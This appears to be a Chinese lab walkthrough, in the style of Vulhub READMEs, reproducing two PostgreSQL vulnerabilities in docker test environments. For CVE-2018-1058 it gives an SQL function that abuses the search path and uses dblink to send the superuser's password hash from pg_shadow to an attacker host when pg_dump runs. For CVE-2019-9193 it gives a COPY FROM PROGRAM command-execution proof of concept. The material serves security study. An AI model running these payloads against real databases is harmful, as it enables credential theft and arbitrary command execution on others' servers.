Readme文件
# PostgreSQL 提权漏洞(CVE-2018-1058)
PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。
参考链接:
- https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058:_Protect_Your_Search_Path
- https://xianzhi.aliyun.com/forum/topic/2109
## 漏洞环境
启动存在漏洞的环境:
```
docker compose up -d
```
环境启动后,将在本地开启PG默认的5432端口。
## 漏洞复现
参考上述链接中的第二种利用方式,我们先通过普通用户`vulhub:vulhub`的身份登录postgres: `psql --host your-ip --username vulhub`
执行如下语句后退出:
```
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;
```
然后我在`10.0.0.1`上监听5433端口,等待超级用户触发我们留下的这个“后门”。
(假装自己是超级用户)在靶场机器下,用超级用户的身份执行`pg_dump`命令:`docker compose exec postgres pg_dump -U postgres -f evil.bak vulhub`,导出vulhub这个数据库的内容。
执行上述命令的同时,“后门”已被触发,`10.0.0.1`机器上已收到敏感信息:
上述过程仅是该漏洞的一种利用方法,涉及到机器比较多可能有点乱,建议读者阅读参考链接中的文章,获取更多利用方法。docker部署完环境后利用命令进行连接数据库,命令见上文
输入sql语句
监听5433端口
导出数据库内容
收到反弹shell,内容是管理员密码md5加密
Readme文件
# PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。
参考链接:
- https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
## 漏洞环境
启动存在漏洞的环境:
```
docker compose up -d
```
环境启动后,将开启Postgres默认的5432端口,默认账号密码为postgres/postgres。
## 漏洞复现
首先连接到postgres中,并执行参考链接中的POC:
```sql
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
```
`FROM PROGRAM`语句将执行命令id并将结果保存在cmd_exec表中:
使用navicat连接数据库
新建查询,输入sql语句,可执行命令
Comments NOTHING